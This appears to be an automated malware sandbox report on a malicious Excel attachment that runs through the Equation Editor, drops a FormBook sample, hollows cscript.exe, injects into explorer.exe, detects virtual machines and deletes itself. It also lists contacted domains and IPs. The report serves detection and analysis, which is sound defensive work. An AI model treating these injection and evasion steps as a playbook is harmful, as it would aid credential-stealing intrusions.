          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_0074FAD0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_0074FB68
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_0074FBB8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FC60 NtMapViewOfSection,LdrInitializeThunk,5_2_0074FC60
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_0074FC90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_0074FDC0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FD8C NtDelayExecution,LdrInitializeThunk,5_2_0074FD8C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_0074FED0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_0074FEA0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FFB4 NtCreateSection,LdrInitializeThunk,5_2_0074FFB4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00750060 NtQuerySection,5_2_00750060
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007510D0 NtOpenProcessToken,5_2_007510D0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00751148 NtOpenThread,5_2_00751148
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075010C NtOpenDirectoryObject,5_2_0075010C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007501D4 NtSetValueKey,5_2_007501D4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007507AC NtCreateMutant,5_2_007507AC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074F8CC NtWaitForSingleObject,5_2_0074F8CC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00751930 NtSetContextThread,5_2_00751930
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074F938 NtWriteFile,5_2_0074F938
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FA50 NtEnumerateValueKey,5_2_0074FA50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FA20 NtQueryInformationFile,5_2_0074FA20
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FAB8 NtQueryValueKey,5_2_0074FAB8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FB50 NtCreateKey,5_2_0074FB50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FBE8 NtQueryVirtualMemory,5_2_0074FBE8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00750C40 NtGetContextThread,5_2_00750C40
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FC48 NtSetInformationFile,5_2_0074FC48
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FC30 NtOpenProcess,5_2_0074FC30
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FD5C NtEnumerateKey,5_2_0074FD5C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00751D80 NtSuspendThread,5_2_00751D80
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FE24 NtWriteVirtualMemory,5_2_0074FE24
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FF34 NtQueueApcThread,5_2_0074FF34
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FFFC NtCreateProcessEx,5_2_0074FFFC
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041A360 NtCreateFile,5_1_0041A360
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041A410 NtReadFile,5_1_0041A410
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041A490 NtClose,5_1_0041A490
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041A540 NtAllocateVirtualMemory,5_1_0041A540
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041A45A NtReadFile,5_1_0041A45A
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041A40A NtReadFile,5_1_0041A40A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023200C4 NtCreateFile,LdrInitializeThunk,7_2_023200C4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023207AC NtCreateMutant,LdrInitializeThunk,7_2_023207AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FAB8 NtQueryValueKey,LdrInitializeThunk,7_2_0231FAB8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_0231FAE8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_0231FAD0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_0231FB68
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FB50 NtCreateKey,LdrInitializeThunk,7_2_0231FB50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_0231FBB8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231F900 NtReadFile,LdrInitializeThunk,7_2_0231F900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231F9F0 NtClose,LdrInitializeThunk,7_2_0231F9F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_0231FED0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FFB4 NtCreateSection,LdrInitializeThunk,7_2_0231FFB4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_0231FC60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FD8C NtDelayExecution,LdrInitializeThunk,7_2_0231FD8C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_0231FDC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02320078 NtResumeThread,7_2_02320078
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02320060 NtQuerySection,7_2_02320060
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02320048 NtProtectVirtualMemory,7_2_02320048
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023210D0 NtOpenProcessToken,7_2_023210D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0232010C NtOpenDirectoryObject,7_2_0232010C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02321148 NtOpenThread,7_2_02321148
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023201D4 NtSetValueKey,7_2_023201D4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FA20 NtQueryInformationFile,7_2_0231FA20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FA50 NtEnumerateValueKey,7_2_0231FA50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FBE8 NtQueryVirtualMemory,7_2_0231FBE8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231F8CC NtWaitForSingleObject,7_2_0231F8CC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02321930 NtSetContextThread,7_2_02321930
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231F938 NtWriteFile,7_2_0231F938
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FE24 NtWriteVirtualMemory,7_2_0231FE24
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FEA0 NtReadVirtualMemory,7_2_0231FEA0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FF34 NtQueueApcThread,7_2_0231FF34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FFFC NtCreateProcessEx,7_2_0231FFFC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FC30 NtOpenProcess,7_2_0231FC30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02320C40 NtGetContextThread,7_2_02320C40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FC48 NtSetInformationFile,7_2_0231FC48
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FC90 NtUnmapViewOfSection,7_2_0231FC90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FD5C NtEnumerateKey,7_2_0231FD5C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02321D80 NtSuspendThread,7_2_02321D80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A360 NtCreateFile,7_2_0008A360
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A410 NtReadFile,7_2_0008A410
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A490 NtClose,7_2_0008A490
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A540 NtAllocateVirtualMemory,7_2_0008A540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A40A NtReadFile,7_2_0008A40A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A45A NtReadFile,7_2_0008A45A
          Source: .vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exeMemory allocated: 76E90000 page execute and read and write
          Source: New order - C.S.I No. 04183.xlsxVirustotal: Detection: 36%
          Source: New order - C.S.I No. 04183.xlsxReversingLabs: Detection: 36%
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$New order - C.S.I No. 04183.xlsx
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCF01.tmp
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/24@2/3
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar,4_2_00402012
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,4_2_0040411B
          Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.459887685.00000000002B0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.495263706.00000000008C0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.460925066.00000000005B0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000007.00000003.494990015.00000000004B0000.00000004.00000001.sdmp, cscript.exe, 00000007.00000002.663624666.0000000002490000.00000040.00000001.sdmp, cscript.exe, 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, cscript.exe, 00000007.00000003.495952417.0000000002180000.00000004.00000001.sdmp
          Source: Binary string: cscript.pdbN source: vbc.exe, 00000005.00000002.495021937.00000000004C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.495522303.0000000002360000.00000040.00020000.sdmp
          Source: Binary string: cscript.pdb source: vbc.exe, 00000005.00000002.495021937.00000000004C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.495522303.0000000002360000.00000040.00020000.sdmp
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_100118D5 push ecx; ret 4_2_100118E8
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_1000DDB7 push edi; iretd 4_2_1000DDB8
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0040E390 push dword ptr [ecx]; retf 5_2_0040E395
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041D4B5 push eax; ret 5_2_0041D508
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00416548 push esi; retf 5_2_0041654C
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041D56C push eax; ret 5_2_0041D572
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041D502 push eax; ret 5_2_0041D508
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041D50B push eax; ret 5_2_0041D572
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00413602 push 0000007Eh; retf 5_2_00413605
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075DFA1 push ecx; ret 5_2_0075DFB4
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0040E390 push dword ptr [ecx]; retf 5_1_0040E395
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041D4B5 push eax; ret 5_1_0041D508
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_00416548 push esi; retf 5_1_0041654C
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041D56C push eax; ret 5_1_0041D572
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041D502 push eax; ret 5_1_0041D508
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041D50B push eax; ret 5_1_0041D572
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_00413602 push 0000007Eh; retf 5_1_00413605
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0232DFA1 push ecx; ret 7_2_0232DFB4
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0007E390 push dword ptr [ecx]; retf 7_2_0007E395
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0008D4B5 push eax; ret 7_2_0008D508
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0008D50B push eax; ret 7_2_0008D572
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0008D502 push eax; ret 7_2_0008D508
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_00086548 push esi; retf 7_2_0008654C
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0008D56C push eax; ret 7_2_0008D572
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_00083602 push 0000007Eh; retf 7_2_00083605
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,4_2_00405C49
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.vbc[1].exe

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xEF
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe | RDTSC instruction interceptor: First address: 0000000000079904 second address: 000000000007990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe | RDTSC instruction interceptor: First address: 0000000000079B7E second address: 0000000000079B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2984 | Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 2092 | Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exe | Last function: Thread delayed
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_00405250
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405C22 FindFirstFileA,FindClose,4_2_00405C22
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00402630 FindFirstFileA,4_2_00402630
          Source: explorer.exe, 00000006.00000000.485535425.000000000457A000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.531903120.000000000460B000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0libr
          Source: explorer.exe, 00000006.00000000.480214467.0000000008402000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000%
          Source: explorer.exe, 00000006.00000000.485535425.000000000457A000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.459995878.0000000000264000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000006.00000000.531615783.000000000456F000.00000004.00000001.sdmp | Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 00000006.00000000.485535425.000000000457A000.00000004.00000001.sdmp | Binary or memory string: pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
          Source: explorer.exe, 00000006.00000000.531546454.00000000044E7000.00000004.00000001.sdmp | Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.527617599.000000000029B000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.531838904.00000000045D6000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_10013450 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_10013450
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,4_2_00405C49
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_10001000 GetProcessHeap,HeapAlloc,RegCreateKeyExW,GetProcessHeap,HeapFree,4_2_10001000
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exe | Process token adjusted: Debug
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_007626F8 mov eax, dword ptr fs:[00000030h] 5_2_007626F8
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_023326F8 mov eax, dword ptr fs:[00000030h] 7_2_023326F8
          Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exe | Process queried: DebugPort
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0040ACF0 LdrLoadDll,5_2_0040ACF0
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_1000F001 SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_1000F001

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 104.21.82.75 80
          Source: C:\Windows\explorer.exe | Domain query: www.oojry.xyz
          Source: C:\Windows\explorer.exe | Domain query: www.crystalsbyzoe.com
          Source: C:\Windows\explorer.exe | Network Connect: 34.246.239.131 80
          Sample uses process hollowing technique
          Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: A40000
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\Public\vbc.exe | Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1764
          Source: C:\Windows\SysWOW64\cscript.exe | Thread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
          Source: explorer.exe, 00000006.00000000.473759544.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.463194949.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.527835651.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.481911491.0000000000750000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.662281409.0000000000A70000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmp | Binary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.473759544.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.463194949.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.527835651.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.481911491.0000000000750000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.662281409.0000000000A70000.00000002.00020000.sdmp | Binary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.473759544.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.463194949.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.527835651.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.481911491.0000000000750000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.662281409.0000000000A70000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_10011025 cpuid 4_2_10011025
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,4_2_0040594D

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
